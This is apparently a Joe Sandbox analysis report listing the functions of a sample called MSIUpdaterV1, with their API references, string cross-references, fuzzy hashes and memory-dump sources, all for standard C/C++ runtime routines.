Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID:
String ID: @U$tU
API String ID: 0-1258186807
Opcode ID: eebb1c49c5d3af18dd50786e12d20aa81fa541c8267e2c30151de6f50e6dc55a
Instruction ID: acb571d7a970c2d4ffe3502142b23c8c9ee6d20f1adad8204bcfd90c0284316f
Opcode Fuzzy Hash: eebb1c49c5d3af18dd50786e12d20aa81fa541c8267e2c30151de6f50e6dc55a
Instruction Fuzzy Hash: FF41B671A04748AFD724EF38CC42B5ABBE9EB58710F20856AF555DB2D1E771EE408B80

Uniqueness

Uniqueness Score: -1.00%

Function 0017B6C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0017B6F7
___except_validate_context_record.LIBVCRUNTIME ref: 0017B6FF
_ValidateLocalCookies.LIBCMT ref: 0017B788
__IsNonwritableInCurrentImage.LIBCMT ref: 0017B7B3
_ValidateLocalCookies.LIBCMT ref: 0017B808

Strings

csm, xrefs: 0017B79D

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 10b403c9223d8456f41e9647b3308a77b0dee8f6ea00827e13fadc7f734673fd
Instruction ID: c8cf0ed3a2710dd8ce74829ec1219f610c4742339f57a6f53b488a16265532c1
Opcode Fuzzy Hash: 10b403c9223d8456f41e9647b3308a77b0dee8f6ea00827e13fadc7f734673fd
Instruction Fuzzy Hash: E8419034A042099BCF14DF68C8D5B9E7BF5AF54324F14C155F81CAB392D731AA15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00187DF9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

@U, xrefs: 00187EC8
tU, xrefs: 00187EC1

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID:
String ID: @U$tU
API String ID: 0-1258186807
Opcode ID: eebb1c49c5d3af18dd50786e12d20aa81fa541c8267e2c30151de6f50e6dc55a
Instruction ID: acb571d7a970c2d4ffe3502142b23c8c9ee6d20f1adad8204bcfd90c0284316f
Opcode Fuzzy Hash: eebb1c49c5d3af18dd50786e12d20aa81fa541c8267e2c30151de6f50e6dc55a
Instruction Fuzzy Hash: FF41B671A04748AFD724EF38CC42B5ABBE9EB58710F20856AF555DB2D1E771EE408B80

Uniqueness

Uniqueness Score: -1.00%

Function 0011E040 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0011E077
___except_validate_context_record.LIBVCRUNTIME ref: 0011E07F
_ValidateLocalCookies.LIBCMT ref: 0011E108
__IsNonwritableInCurrentImage.LIBCMT ref: 0011E133
_ValidateLocalCookies.LIBCMT ref: 0011E188

Strings

csm, xrefs: 0011E11D

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b124bbdffd99e5b1f67580788a06881f70e9550089e51eb7bd6f06fa1e2404e2
Instruction ID: 8751d13b0a7e9e9abb326424670989950535b0252c76063e2e38532353e9bc77
Opcode Fuzzy Hash: b124bbdffd99e5b1f67580788a06881f70e9550089e51eb7bd6f06fa1e2404e2
Instruction Fuzzy Hash: 8341B234A00218ABCF18DFA8C885ADEBBF5AF45314F148175FC189B392D775D982CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0012A0C5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,0000000F,84C11AEF,?,0012A1D2,00000005,00129083,?,00000000,0000000F,?,0012A380,00000021,FlsSetValue,0013B1C8), ref: 0012A186

Strings

ext-ms-, xrefs: 0012A130
api-ms-, xrefs: 0012A11C

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: cae2d53c559791a907bc009dd9919b2cae7780723770dc43cffdf4501f39f7f3
Instruction ID: 8209892458fb782ed6f0b7b89c2ae18e7227da83bb6595e7d8f41711e9ccda0f
Opcode Fuzzy Hash: cae2d53c559791a907bc009dd9919b2cae7780723770dc43cffdf4501f39f7f3
Instruction Fuzzy Hash: 12210672A05231ABDB36AB24FC85A5B7768EF42770F650150FA15E72D0DB30EE20C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 00185DC3 Relevance: 9.3, APIs: 6, Instructions: 285COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00185F4B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00185F67
__allrem.LIBCMT ref: 00185F7E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00185F9C
__allrem.LIBCMT ref: 00185FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00185FD1

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f213e0134495f7c5a7e88258e0fbbceb8bfcf6009b8a2ab13219576b5ba2bf3d
Instruction ID: 75fee9fdf8c40ca5e166e166b37607db19ddb71787431d26e6cc165d7ab7cf8a
Opcode Fuzzy Hash: f213e0134495f7c5a7e88258e0fbbceb8bfcf6009b8a2ab13219576b5ba2bf3d
Instruction Fuzzy Hash: AD81F972600B06ABD724BE68CC82BABB3EAEF50764F244129F511D7281E774DF448F94

Uniqueness

Uniqueness Score: -1.00%

Function 00116980 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0011698D
std::_Lockit::_Lockit.LIBCPMT ref: 001169AB
std::_Lockit::~_Lockit.LIBCPMT ref: 001169CC
std::_Lockit::~_Lockit.LIBCPMT ref: 00116A1C
std::_Facet_Register.LIBCPMT ref: 00116A46
std::_Lockit::~_Lockit.LIBCPMT ref: 00116A5F

Part of subcall function 00111870: ___std_exception_copy.LIBVCRUNTIME ref: 001118AC

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register___std_exception_copy
String ID:
API String ID: 728164013-0
Opcode ID: 42b25d69610cfab61d6dec87d2054dec7acf1ba59c2cff345ad004841e0701ac
Instruction ID: 76d255c9505284d06a371aeed197791ef3cc6c1a6e5eb0d71539e9c1b47d0594
Opcode Fuzzy Hash: 42b25d69610cfab61d6dec87d2054dec7acf1ba59c2cff345ad004841e0701ac
Instruction Fuzzy Hash: 565145326082109FC71DEF28E8806EBB7A4EF91324F154239F8549B252D732ED99C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00181CDC Relevance: 9.2, Strings: 7, Instructions: 456COMMON

Download Yara Rule

Strings

f, xrefs: 00181E2D
p, xrefs: 00181DEE
p, xrefs: 00181E34
:, xrefs: 00181DA0
f, xrefs: 00181DE7
f, xrefs: 00181DCB
p, xrefs: 00181DD2

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID:
String ID: :$f$f$f$p$p$p
API String ID: 0-1434680307
Opcode ID: 622bd4d929814ddfeb804b5ce89127657612a5b746b292797715c7862fe05437
Instruction ID: 48f63ed242044ce263117d5496fc020ba5fe9996131fbd03e6f35be06cc2061e
Opcode Fuzzy Hash: 622bd4d929814ddfeb804b5ce89127657612a5b746b292797715c7862fe05437
Instruction Fuzzy Hash: 9BF18E79A001099ADF26AFA4D8696FDB7B6FB40B14F74410AE811BB284D7308F85CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0011ABF3 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00111BEF,?,00000001,?,?,00000001,?,00111BEF,?), ref: 0011AC3C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00111BEF,?,?), ref: 0011ACA7
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00111BEF,?,?), ref: 0011ACC4
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00111BEF,?,?), ref: 0011AD03
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00111BEF,?,?), ref: 0011AD62
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00111BEF,?,?), ref: 0011AD85

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: a6a46ec8f5247c40e487143e1eca8b984ffd4db836283c89016ca5207fe9e25a
Instruction ID: 3dd9374d92e50521f01d1e426089581e3bc5abe0278705dcd04e30a756eae941
Opcode Fuzzy Hash: a6a46ec8f5247c40e487143e1eca8b984ffd4db836283c89016ca5207fe9e25a
Instruction Fuzzy Hash: D651BF7250160AABEF284FA0EC41FEB7FA9EF44741F514439F915DA590EB30CC909B91

Uniqueness

Uniqueness Score: -1.00%

Function 0015E460 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0015E49D
std::_Lockit::_Lockit.LIBCPMT ref: 0015E4BF
std::_Lockit::~_Lockit.LIBCPMT ref: 0015E4E7
__Getctype.LIBCPMT ref: 0015E5C5
std::_Facet_Register.LIBCPMT ref: 0015E5F9
std::_Lockit::~_Lockit.LIBCPMT ref: 0015E623

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: b51969a48f599e500b82d6309b25276fc383fd262fd2ac7f9ce1c04f02988e66
Instruction ID: 6897f926eb87e98af146d5aba5bd29e870c64dbe3542a54dc125fe2d63bd7788
Opcode Fuzzy Hash: b51969a48f599e500b82d6309b25276fc383fd262fd2ac7f9ce1c04f02988e66
Instruction Fuzzy Hash: 7E51ACB0D00649CBDB15DF58C9417AEBBF0FB24314F14825DE865AB391E774AA48CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0015E460 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0015E49D
std::_Lockit::_Lockit.LIBCPMT ref: 0015E4BF
std::_Lockit::~_Lockit.LIBCPMT ref: 0015E4E7
__Getctype.LIBCPMT ref: 0015E5C5
std::_Facet_Register.LIBCPMT ref: 0015E5F9
std::_Lockit::~_Lockit.LIBCPMT ref: 0015E623

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: b51969a48f599e500b82d6309b25276fc383fd262fd2ac7f9ce1c04f02988e66
Instruction ID: 6897f926eb87e98af146d5aba5bd29e870c64dbe3542a54dc125fe2d63bd7788
Opcode Fuzzy Hash: b51969a48f599e500b82d6309b25276fc383fd262fd2ac7f9ce1c04f02988e66
Instruction Fuzzy Hash: 7E51ACB0D00649CBDB15DF58C9417AEBBF0FB24314F14825DE865AB391E774AA48CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00161660 Relevance: 9.1, APIs: 6, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0016168A
std::_Lockit::_Lockit.LIBCPMT ref: 001616AC
std::_Lockit::~_Lockit.LIBCPMT ref: 001616D4
__Getcoll.LIBCPMT ref: 0016179F
std::_Facet_Register.LIBCPMT ref: 001617E4
std::_Lockit::~_Lockit.LIBCPMT ref: 0016180E

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: ce5c36eee049610c7891035b4c69d3dbb1e038f83e28ef51f5dee14bfaf62745
Instruction ID: c4acbbaeb6daf251be9ed8222c3ff86c8333585d97c4f43390273721413ca03b
Opcode Fuzzy Hash: ce5c36eee049610c7891035b4c69d3dbb1e038f83e28ef51f5dee14bfaf62745
Instruction Fuzzy Hash: 7B517AB1D01608EFDB01DF58C9447AEBBF4FF60314F288059E8196B391D775AA09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00161660 Relevance: 9.1, APIs: 6, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0016168A
std::_Lockit::_Lockit.LIBCPMT ref: 001616AC
std::_Lockit::~_Lockit.LIBCPMT ref: 001616D4
__Getcoll.LIBCPMT ref: 0016179F
std::_Facet_Register.LIBCPMT ref: 001617E4
std::_Lockit::~_Lockit.LIBCPMT ref: 0016180E

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: ce5c36eee049610c7891035b4c69d3dbb1e038f83e28ef51f5dee14bfaf62745
Instruction ID: c4acbbaeb6daf251be9ed8222c3ff86c8333585d97c4f43390273721413ca03b
Opcode Fuzzy Hash: ce5c36eee049610c7891035b4c69d3dbb1e038f83e28ef51f5dee14bfaf62745
Instruction Fuzzy Hash: 7B517AB1D01608EFDB01DF58C9447AEBBF4FF60314F288059E8196B391D775AA09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00116410 Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0011641D
std::_Lockit::_Lockit.LIBCPMT ref: 0011643B
std::_Lockit::~_Lockit.LIBCPMT ref: 0011645C
std::_Lockit::~_Lockit.LIBCPMT ref: 001164AC
std::_Facet_Register.LIBCPMT ref: 001164D6
std::_Lockit::~_Lockit.LIBCPMT ref: 001164EF

Part of subcall function 00111870: ___std_exception_copy.LIBVCRUNTIME ref: 001118AC

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register___std_exception_copy
String ID:
API String ID: 728164013-0
Opcode ID: 3385062a71c5f8204b2f71d423ecef62ebf5bea910785af7e6d92a50bfde6f46
Instruction ID: 0b29e38c7dae9a1e77bca3e56b4362875c6877898b637702b543c3baee15f369
Opcode Fuzzy Hash: 3385062a71c5f8204b2f71d423ecef62ebf5bea910785af7e6d92a50bfde6f46
Instruction Fuzzy Hash: E12134395082218FC729EF14E840AEAB3B0EFA1320F054579F854577A1DB32ED86CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0011E23A Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0011E231,0011BEB8,0011BAF2), ref: 0011E248
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0011E256
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0011E26F
SetLastError.KERNEL32(00000000,0011E231,0011BEB8,0011BAF2), ref: 0011E2C1

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1f16ab777c17990522e76e0b77ff55db200af4ceb474747f6bb39bdb4523136d
Instruction ID: 0f059cb0a8026c9ded600eb372f3e13744f78b62d4937f4414550f83a20e4889
Opcode Fuzzy Hash: 1f16ab777c17990522e76e0b77ff55db200af4ceb474747f6bb39bdb4523136d
Instruction Fuzzy Hash: D001D43210C6116EAA3C2BF5BC95AE72ACAEB22774720033DF910828F1EF714CC19281

Uniqueness

Uniqueness Score: -1.00%

Function 00125B8F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,84C11AEF,?,?,00000000,00136AEB,000000FF,?,00125B1F,00000002,?,00125AF3,00124874), ref: 00125BC4
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00125BD6
FreeLibrary.KERNEL32(00000000,?,?,00000000,00136AEB,000000FF,?,00125B1F,00000002,?,00125AF3,00124874), ref: 00125BF8

Strings

CorExitProcess, xrefs: 00125BCE
mscoree.dll, xrefs: 00125BBD

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
